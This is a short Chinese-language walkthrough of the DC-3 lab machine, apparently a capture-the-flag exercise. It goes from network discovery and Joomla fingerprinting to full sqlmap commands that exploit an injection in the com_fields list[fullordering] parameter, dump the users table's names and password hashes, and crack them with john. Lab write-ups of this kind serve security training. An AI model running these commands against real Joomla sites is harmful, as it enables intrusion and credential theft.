靶机入侵 DC3
渗透环境
kali Linux
DC-3 桥接同一网段
1.根据靶机mac地址寻找ip
KALI 自带的ARP侦查工具扫描
netdiscove
2.nmap查看开放放口
nmap -O 10.3.139.67 -p-
3.使用whatweb对网站进行指纹识别
whatweb http://10.3.139.67
查询到网站的CMS
4.joomscan 进行漏扫
joomscan --url http://10.3.139.67
4.使用searchsploit 进行本地漏洞在线查询
5.更改地址利用sqlmap进行查询注入点
--dbs列出数据库有哪些库名
sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
6.确定web应用连接的是哪个数据库
sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]
7.指定数据库查询数据库中的表
sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
8.查询#__users表中的字段
sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
9.查询admin,password字段内容
sqlmap -u "http://10.3.139.67/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]
10.john解密密文
使用kali的john是遇到的坑
当它解密之后无法再次解密该文件
解决:删除 .john/john.pot 文件下解密过的字符串
john /etc/joomla_v370.txt